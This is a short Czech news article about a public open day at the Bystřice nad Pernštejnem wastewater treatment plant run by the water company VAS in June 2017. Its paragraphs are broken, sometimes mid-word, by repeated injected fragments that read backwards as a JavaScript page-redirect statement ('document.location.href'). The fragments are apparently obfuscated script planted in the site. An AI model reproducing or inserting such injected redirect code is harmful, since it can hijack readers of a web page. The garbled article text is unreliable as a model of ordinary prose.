Rainbow page separator

Bystřická čistírna odpadních vod se otevře veřejnosti

Čtvrtek, 8. června 2017

Bystřice nad Pernštejnem / Vodárenská akciová společnost (VAS) zve zájemce z řad veřejnosti i žáky a studenty na prohlídky objektů sloužících k výrobě pitné vody a čištění odpadních vod. V pátek 16. června v době od 9 do 16 hodin tak lidé mohou zavítat do míst, kam se jindy nedostanou, a dozvědět se informace o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, odkud se do jejich domácností dostává pitná voda, jak se vyrábí, ale i kde končí voda, která odteče z dřezů, umyvadel, van či [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toalet.
Ve žďárské divizi VAS se den otevřených dveří týká čistírny odpadních vod v Bystřici nad Pernštejnem. „Zájemci se budou moci podívat na zajímavá místa, kde jim informace o his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torii, používaných technologiích a dalších zajímavostech sdělí odborní pracovníci. Cílem akce je přiblížit lidem, co vše má společnost na starosti a o co pečuje,“ sdělila Iva Šebková, vedoucí marketingu a komunikace společnosti.